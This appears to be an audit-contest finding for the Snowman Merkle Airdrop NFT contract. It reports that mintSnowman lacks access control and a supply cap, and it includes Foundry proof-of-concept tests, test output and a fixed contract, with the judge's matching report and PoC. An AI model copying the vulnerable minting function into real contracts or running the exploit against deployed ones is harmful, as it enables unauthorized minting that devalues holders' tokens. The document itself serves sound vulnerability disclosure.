Snowman Merkle Airdrop

AI First Flight #10
Beginner FriendlyFoundrySolidityNFT
EXP
View results
Submission Details
Severity: high
Valid

Unrestricted Access to mintSnowman Allows Arbitrary Free Minting

Root + Impact

Description

  • Root cause: mintSnowman has no access control check (e.g. onlyOwner, onlyRole(MINTER_ROLE)) and no bound on amount relative to a maximum supply. The function assumes only a trusted caller will invoke it, but nothing in the code enforces that assumption.

  • And consider gas optimization

  • Impact: Because the root cause is a missing authorization check on a state changing entry point, the impact is direct and unmediated, any caller inherits full minting privileges with no additional exploit steps required. This is a single point of failure: one missing modifier collapses the entire access-control model for token issuance.

// The function is declared external with no access-restricting modifier
// and no validation of msg.sender. As a result, mintSnowman behaves as a
// public faucet: any address can call it directly, specify itself (or any
// other address) as receiver, and specify an arbitrary amount of tokens to mint.
// There is also no cap comparing s_TokenCounter + amount against a maximum supply,
// so an attacker can inflate total supply without limit (bounded only by block gas limit
// per transaction, which can be trivially worked around with multiple calls).
@> function mintSnowman(address receiver, uint256 amount) external {
for (uint256 i = 0; i < amount; i++) {
_safeMint(receiver, s_TokenCounter);
emit SnowmanMinted(receiver, s_TokenCounter);
s_TokenCounter++;
}
}

Risk

Likelihood:

  • The function is declared external with no access-restricting modifier and no validation of msg.sender

  • As a result, mintSnowman behaves as a public faucet: any address can call it directly, specify itself (or any other address) as receiver, and specify an arbitrary amount of tokens to mint.

Impact:

  • Because the root cause is a missing authorization check on a state-changing entry point, the impact is direct and unmediated.


Proof of Concept

Proof Of Concept
contract SnowmanExploitTest is Test { VulnerableSnowman vulnerable;
FixedSnowman fixedContract;
address deployer = makeAddr("deployer");
address attacker = makeAddr("attacker");
address victim = makeAddr("victim");
function setUp() public {
vm.prank(deployer);
vulnerable = new VulnerableSnowman();
vm.prank(deployer);
fixedContract = new FixedSnowman();
}
/// @notice PoC: any random address (not the owner/deployer) can mint
/// an arbitrary number of NFTs to any address, for free.
function test_Exploit_AnyoneCanMintUnlimitedSupply() public {
assertEq(vulnerable.balanceOf(attacker), 0);
// Attacker is a completely unrelated, unprivileged address.
vm.prank(attacker);
vulnerable.mintSnowman(attacker, 50);
assertEq(vulnerable.balanceOf(attacker), 50);
assertEq(vulnerable.s_TokenCounter(), 50);
console.log("Attacker minted 50 tokens with zero permissions.");
// Attacker can also mint to any other address, e.g. to spam/dilute
// the collection or forge fake "gifts".
vm.prank(attacker);
vulnerable.mintSnowman(victim, 25);
assertEq(vulnerable.balanceOf(victim), 25);
assertEq(vulnerable.s_TokenCounter(), 75);
console.log("Attacker minted 25 more tokens directly to a victim address.");
}
/// @notice PoC: attacker can mint far beyond any sane "max supply",
/// diluting the collection to worthlessness (bounded here to stay
/// within block gas limits, but the point stands: there's no cap).
function test_Exploit_UnboundedSupplyInflation() public {
vm.prank(attacker);
vulnerable.mintSnowman(attacker, 5000);
assertEq(vulnerable.balanceOf(attacker), 5000);
console.log("Attacker single-handedly inflated supply to 5000 tokens.");
}
/// @notice Control: confirm the fixed contract blocks the same attack.
function test_Fixed_NonOwnerCannotMint() public {
vm.prank(attacker);
vm.expectRevert(); // Ownable: caller is not the owner
fixedContract.mintSnowman(attacker, 10);
assertEq(fixedContract.balanceOf(attacker), 0);
}
/// @notice Control: confirm the fixed contract enforces MAX_SUPPLY.
function test_Fixed_RespectsMaxSupply() public {
vm.prank(deployer);
vm.expectRevert(bytes("Exceeds max supply"));
fixedContract.mintSnowman(deployer, fixedContract.MAX_SUPPLY() + 1);
}
/// @notice Control: legitimate owner mint still works as expected.
function test_Fixed_OwnerCanMintWithinCap() public {
vm.prank(deployer);
fixedContract.mintSnowman(victim, 10);
assertEq(fixedContract.balanceOf(victim), 10);
assertEq(fixedContract.s_TokenCounter(), 10);
}

}

Recommended Mitigation

Restrict mintSnowman to a trusted role (onlyOwner or a dedicated MINTER_ROLE), and enforce a MAX_SUPPLY check before minting, as shown in the FixedSnowman contract and validated by test_Fixed_NonOwnerCannotMint and test_Fixed_RespectsMaxSupply.

- remove this code
function mintSnowman(address receiver, uint256 amount) external {
for (uint256 i = 0; i < amount; i++) {
_safeMint(receiver, s_TokenCounter);
emit SnowmanMinted(receiver, s_TokenCounter);
s_TokenCounter++;
}
}
+ add this code
import {Ownable} from "@openzeppelin/contracts/access/Ownable.sol";
contract FixedSnowman is ERC721, Ownable {
uint256 public s_TokenCounter;
uint256 public constant MAX_SUPPLY = 10_000;
event SnowmanMinted(address indexed receiver, uint256 indexed tokenId);
constructor() ERC721("Snowman", "SNOW") Ownable(msg.sender) {}
function mintSnowman(address receiver, uint256 amount) external onlyOwner {
require(receiver != address(0), "Invalid receiver");
require(amount > 0, "Amount must be > 0");
uint256 tokenId = s_TokenCounter;
require(tokenId + amount <= MAX_SUPPLY, "Exceeds max supply");
for (uint256 i = 0; i < amount; i++) {
_safeMint(receiver, tokenId);
emit SnowmanMinted(receiver, tokenId);
unchecked {
tokenId++;
}
}
s_TokenCounter = tokenId;
}
}
Updates

Lead Judging Commences

ai-first-flight-judge Lead Judge 1 day ago
Submission Judgement Published
Validated
Assigned finding tags:

[H-01] Unrestricted NFT Minting in Snowman.sol

# Root + Impact ## Description * The Snowman NFT contract is designed to mint NFTs through a controlled airdrop mechanism where only authorized entities should be able to create new tokens for eligible recipients. * The `mintSnowman()` function lacks any access control mechanisms, allowing any external address to call the function and mint unlimited NFTs to any recipient without authorization, completely bypassing the intended airdrop distribution model. ```Solidity // Root cause in the codebase function mintSnowman(address receiver, uint256 amount) external { @> // NO ACCESS CONTROL - Any address can call this function for (uint256 i = 0; i < amount; i++) { _safeMint(receiver, s_TokenCounter); emit SnowmanMinted(receiver, s_TokenCounter); s_TokenCounter++; } @> // NO VALIDATION - No checks on amount or caller authorization } ``` ## Risk **Likelihood**: * The vulnerability will be exploited as soon as any malicious actor discovers the contract address, since the function is publicly accessible with no restrictions * Automated scanning tools and MEV bots continuously monitor new contract deployments for exploitable functions, making discovery inevitable **Impact**: * Complete destruction of tokenomics through unlimited supply inflation, rendering all legitimate NFTs worthless * Total compromise of the airdrop mechanism, allowing attackers to mint millions of tokens and undermine the project's credibility and economic model ## Proof of Concept ```Solidity // SPDX-License-Identifier: MIT pragma solidity ^0.8.24; import {Test, console2} from "forge-std/Test.sol"; import {Snowman} from "../src/Snowman.sol"; contract SnowmanExploitPoC is Test { Snowman public snowman; address public attacker = makeAddr("attacker"); string constant SVG_URI = "data:image/svg+xml;base64,PHN2Zy4uLi4+"; function setUp() public { snowman = new Snowman(SVG_URI); } function testExploit_UnrestrictedMinting() public { console2.log("=== UNRESTRICTED MINTING EXPLOIT ==="); console2.log("Initial token counter:", snowman.getTokenCounter()); console2.log("Attacker balance before:", snowman.balanceOf(attacker)); // EXPLOIT: Anyone can mint unlimited NFTs vm.prank(attacker); snowman.mintSnowman(attacker, 1000); // Mint 1K NFTs console2.log("Final token counter:", snowman.getTokenCounter()); console2.log("Attacker balance after:", snowman.balanceOf(attacker)); // Verify exploit success assertEq(snowman.balanceOf(attacker), 1000); assertEq(snowman.getTokenCounter(), 1000); console2.log(" EXPLOIT SUCCESSFUL - Minted 1K NFTs without authorization"); } } ``` <br /> PoC Results: ```Solidity forge test --match-test testExploit_UnrestrictedMinting -vv [⠑] Compiling... [⠢] Compiling 1 files with Solc 0.8.29 [⠰] Solc 0.8.29 finished in 1.45s Compiler run successful! Ran 1 test for test/SnowmanExploitPoC.t.sol:SnowmanExploitPoC [PASS] testExploit_UnrestrictedMinting() (gas: 26868041) Logs: === UNRESTRICTED MINTING EXPLOIT === Initial token counter: 0 Attacker balance before: 0 Final token counter: 1000 Attacker balance after: 1000 EXPLOIT SUCCESSFUL - Minted 1K NFTs without authorization Suite result: ok. 1 passed; 0 failed; 0 skipped; finished in 4.28ms (3.58ms CPU time) Ran 1 test suite in 10.15ms (4.28ms CPU time): 1 tests passed, 0 failed, 0 skipped (1 total tests) ``` ## Recommended Mitigation Adding the `onlyOwner` modifier restricts the `mintSnowman()` function to only be callable by the contract owner, preventing unauthorized addresses from minting NFTs. ```diff - function mintSnowman(address receiver, uint256 amount) external { + function mintSnowman(address receiver, uint256 amount) external onlyOwner { for (uint256 i = 0; i < amount; i++) { _safeMint(receiver, s_TokenCounter); emit SnowmanMinted(receiver, s_TokenCounter); s_TokenCounter++; } } ```

Support

FAQs

Can't find an answer? Chat with us on Discord, Twitter or Linkedin.

Give us feedback!